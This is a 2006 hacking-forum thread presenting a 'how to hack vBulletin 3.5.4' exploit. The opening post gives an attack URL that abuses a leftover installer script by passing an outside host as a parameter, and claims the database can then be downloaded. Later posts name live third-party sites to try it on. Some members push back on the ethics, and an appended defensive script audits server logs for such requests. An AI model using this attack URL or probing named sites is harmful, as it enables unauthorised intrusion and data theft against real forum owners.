
How to hack a vbulletin 3.5.4 (Video)


35 replies to this topic

#1 M4k3

M4k3

    H4x0r

  • Members
  • 32 posts

Posted 05 July 2006 - 02:06 PM

Hello,

Here I will show you how to hack a vBulletin 3.5.4:

video:
http://rapidshare.de/files/25032471/vbulletinhackby_www.pldsoft.com.rar.html
exploit:
##############################################
vBulletin 3.5.4 exploit.....install path is open or not secure
###############################################

Discovered By M4k3 PLDsoft Security Team, www.pldsoft.com
Remote : Yes
Critical Level : Dangerous
############################################
Affected software description :

Application : vbulletin
version : latest version [ 3.60 Release 4 ]
URL : http://www.vbulletin.com

########################################
Exploit:

www.vicitimsite.com/forumpath/install/upgrade_301.php?step=http://ww.pldsoft.com

when it works, you can still download the database.....

########################################
Contact:

Nick: M4k3
E-mail: mikathebest2003@yahoo.de
Homepage: http://www.pldsoft.com

Edited by M4k3, 05 July 2006 - 02:35 PM.


#2 Trikk

Trikk

    SUPR3M3 31337 Mack Daddy P1MP

  • Members
  • 348 posts
  • Country:
  • Gender:Male
  • Location:Portland, OR

Posted 05 July 2006 - 02:14 PM

From what I remember, when you install vBulletin and get done with it, doesn't it make you delete the /install/ folder and everything under it?

EDIT: Just tried it on a friend's site, you need to have a Customer ID in order to continue with the step.

Edited by Trikk, 05 July 2006 - 02:16 PM.


#3 M4k3

M4k3

    H4x0r

  • Members
  • 32 posts

Posted 05 July 2006 - 02:16 PM

You only delete the index.php in the folder.

Check it out on this site:
undergr0und.net

Edited by M4k3, 05 July 2006 - 02:16 PM.


#4 Trikk

Trikk

    SUPR3M3 31337 Mack Daddy P1MP

  • Members
  • 348 posts
  • Country:
  • Gender:Male
  • Location:Portland, OR

Posted 05 July 2006 - 02:25 PM

That site does not have a vBulletin forum :huh:

Underground Electronic Network Security Lab.
www.undergr0und.net

Powered by zero blog


EDIT: ruiner zer0 - didn't he use to be on the CIA forums? :blink:

Edited by Trikk, 05 July 2006 - 02:26 PM.


#5 M4k3

M4k3

    H4x0r

  • Members
  • 32 posts

Posted 05 July 2006 - 02:26 PM

Man.....I think you will be able to find the forum path.........

http://undergr0und.net/forum/index.php

#6 Trikk

Trikk

    SUPR3M3 31337 Mack Daddy P1MP

  • Members
  • 348 posts
  • Country:
  • Gender:Male
  • Location:Portland, OR

Posted 05 July 2006 - 02:28 PM

heh, it wasn't links on the main site.

very nice though

Edited by Trikk, 05 July 2006 - 02:31 PM.


#7 M4k3

M4k3

    H4x0r

  • Members
  • 32 posts

Posted 05 July 2006 - 02:30 PM

Thx, now I will try to make a Perl exploit for it.

Because on many boards when you enter /install/ you need a number, and I will write code that will break it down.

#8 tehbizz

tehbizz

    Progenitor of noob slaying

  • Members
  • 2,039 posts
  • Gender:Male

Posted 05 July 2006 - 02:34 PM

This *is* a remote exploit, change your header.

BTW, please spell check this thing, it's vBulletin not vbulltin.

#9 M4k3

M4k3

    H4x0r

  • Members
  • 32 posts

Posted 05 July 2006 - 02:35 PM

Oh....thx for this..I have changed it.

#10 kitche

kitche

    Hakker addict

  • Members
  • 549 posts

Posted 05 July 2006 - 07:37 PM

umm most of the exploits are usually for null

#11 xof7

xof7

    Hakker addict

  • Members
  • 558 posts
  • Location:Spokane, Washington

Posted 06 July 2006 - 04:10 PM

How do you detect if the forum is vulnerable? (besides the manual way).
Or is there any way to bruteforce the customer key?

Oh yeah and all the forums in the vid are patched : <

Edited by xof7, 06 July 2006 - 04:10 PM.


#12 M4k3

M4k3

    H4x0r

  • Members
  • 32 posts

Posted 06 July 2006 - 04:18 PM

Well, you have try it on nulled version.

I will make a new exploit that will break down the number code that you have to enter.

The forums are now protected....because I have warned the admins...

#13 savant

savant

    SUPR3M3 31337 Mack Daddy P1MP

  • Agents of the Revolution
  • 368 posts
  • Gender:Male
  • Location:408

Posted 06 July 2006 - 04:23 PM

Hey guys, I don't mean to rain on any parades here, or backseat mod... but:

1.) Should you really be so openly talking about specific vulnerable sites on the internet? Sure does look like you're intending to penetrate them. This is a forum that appears on Google, is it beyond belief that the Feds are reading this very post?

2.) Shouldn't this be in the Newbie HQ? You've got a video showing how to run a perl script? I mean, it's pretty cool that you found this vulnerability (or did you just write the 'sploit?) but do we _really_ need to be handing children the proverbial handgun? Anyone who uses this script isn't automatically a "hacker", they just watched a video. No different than kids running winnuke (in terms of skill level), am I wrong?

Enabling script kiddies doesn't make you a hacker, it just ensures the three letter agencies will open a dossier on you.

#14 M4k3

M4k3

    H4x0r

  • Members
  • 32 posts

Posted 06 July 2006 - 04:30 PM

Then you have to create a forum....for people who have more knowledge than others.

#15 xof7

xof7

    Hakker addict

  • Members
  • 558 posts
  • Location:Spokane, Washington

Posted 06 July 2006 - 04:35 PM

How do you expect people to learn when there is no one to show them the way? By doing these things and reading about them you slowly start to understand the most typical mistakes that are made by programmers. There has not been a single word mentioned on actually doing anything with the gained information on this forum so there should be nothing to complain about yet.

#16 savant

savant

    SUPR3M3 31337 Mack Daddy P1MP

  • Agents of the Revolution
  • 368 posts
  • Gender:Male
  • Location:408

Posted 06 July 2006 - 05:02 PM

> How do you expect people to learn when there is no one to show them the way? By doing these things and reading about them you slowly start to understand the most typical mistakes that are made by programmers. There has not been a single word mentioned on actually doing anything with the gained information on this forum so there should be nothing to complain about yet.



There are certainly people to show them the way, but to answer your question: What we all did. We read. A lot. And then read some more. For most of the waking hours of the day for years on end, burning with obsession to understand it all.

If you had explained where the vulnerability exists in the software, which attack you're using (remote inclusion?), how you were able to extract the data, and how it could have been patched, then you're teaching. If you're just teaching how to run a perl script, then you might be jumping the gun. It just feels like you're teaching them to pull the trigger before teaching them how to load, how to cock, how to aim, and how to not kill anyone they weren't intending to. If they can't run an exploit then they probably don't know Linux, and if they don't know Linux then what are they going to do once they gain access into the box?

I agree there should be a forum for people who don't know the basics. We have one, it's called the Newbie HQ :) Don't think by posting in there that you're a newbie, you're helping out people who know less.

I seriously hope you don't misinterpret my concerns as anything more than an older cousin, making sure you don't get into trouble and hopefully pointing you in the right direction...

[edit: typos]

Edited by stonersavant, 06 July 2006 - 05:04 PM.


#17 xof7

xof7

    Hakker addict

  • Members
  • 558 posts
  • Location:Spokane, Washington

Posted 06 July 2006 - 05:16 PM


> > How do you expect people to learn when there is no one to show them the way? By doing these things and reading about them you slowly start to understand the most typical mistakes that are made by programmers. There has not been a single word mentioned on actually doing anything with the gained information on this forum so there should be nothing to complain about yet.
>
> There are certainly people to show them the way, but to answer your question: What we all did. We read. A lot. And then read some more. For most of the waking hours of the day for years on end, burning with obsession to understand it all.
>
> If you had explained where the vulnerability exists in the software, which attack you're using (remote inclusion?), how you were able to extract the data, and how it could have been patched, then you're teaching. If you're just teaching how to run a perl script, then you might be jumping the gun. It just feels like you're teaching them to pull the trigger before teaching them how to load, how to cock, how to aim, and how to not kill anyone they weren't intending to. If they can't run an exploit then they probably don't know Linux, and if they don't know Linux then what are they going to do once they gain access into the box?
>
> I agree there should be a forum for people who don't know the basics. We have one, it's called the Newbie HQ :) Don't think by posting in there that you're a newbie, you're helping out people who know less.
>
> I seriously hope you don't misinterpret my concerns as anything more than an older cousin, making sure you don't get into trouble and hopefully pointing you in the right direction...
>
> [edit: typos]


lol. did u even watch the vid for the exploit or read his post?

#18 savant

savant

    SUPR3M3 31337 Mack Daddy P1MP

  • Agents of the Revolution
  • 368 posts
  • Gender:Male
  • Location:408

Posted 06 July 2006 - 05:25 PM

Sure I did. Did you completely forget about the part, just a few posts above ours, where you are pointing out specific sites to attack? Looks like you had the good sense to edit them out.

Come on guys, this isn't a leetness pissing contest.

Edited by stonersavant, 06 July 2006 - 05:28 PM.


#19 xof7

xof7

    Hakker addict

  • Members
  • 558 posts
  • Location:Spokane, Washington

Posted 07 July 2006 - 03:01 PM

All you do in this vuln is append a directory, a file name, and an argument to the file. This is hardly even an exploit... With something so easy it should be obvious that the newbs are going to be rushing to it somehow.

#20 Eggman

Eggman

    DDP Fan club member

  • Members
  • 53 posts
  • Location:aisle 9

Posted 08 July 2006 - 08:16 PM

So it seems that by setting up a password during the vB install this "exploit" is overcome. Thanks for putting what you got up for others to see but it seems that this would only work on an idiot's site.
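
A defender-side check for the pattern this thread describes, as an added example that is not part of any post above: it scans web server access logs for requests to installer scripts under /install/ and flags those answered with 200 (the directory was never removed) or carrying a non-numeric `step` value. The log lines are constructed samples, and treating numeric `step` values as the normal case is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Installer scripts that should not be reachable on a production forum.
INSTALLER = re.compile(r"/install/(?:install|upgrade_\w+)\.php$", re.I)
# Common/combined access-log format: client, timestamp, request line, status.
LOG_LINE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

def audit(lines):
    """Return one finding per request that touched an installer script."""
    findings = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue  # not a parseable access-log line
        url = urlsplit(m["target"])
        if not INSTALLER.search(url.path):
            continue
        step = parse_qs(url.query).get("step", [""])[0]
        findings.append({
            "ip": m["ip"],
            "when": m["ts"],
            "path": url.path,
            # 200 means the installer is still on disk and being served.
            "reachable": m["status"] == "200",
            # Assumption: legitimate upgrade links use integer steps, so
            # anything else (such as a URL) deserves a closer look.
            "odd_step": bool(step) and not step.isdigit(),
        })
    return findings

# Constructed sample log lines (documentation addresses and hosts).
SAMPLE = [
    '203.0.113.7 - - [05/Jul/2006:14:10:01 +0000] "GET /forum/install/upgrade_301.php?step=http://example.invalid HTTP/1.1" 200 5120',
    '203.0.113.7 - - [05/Jul/2006:14:10:05 +0000] "GET /forum/index.php HTTP/1.1" 200 20480',
    '198.51.100.9 - - [06/Jul/2006:16:20:11 +0000] "GET /forum/install/upgrade_301.php?step=1 HTTP/1.1" 404 312',
]

if __name__ == "__main__":
    for f in audit(SAMPLE):
        print(f)
```

Any finding with `reachable` set means the /install/ directory should be removed or blocked at the web server, whatever the `step` value was.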



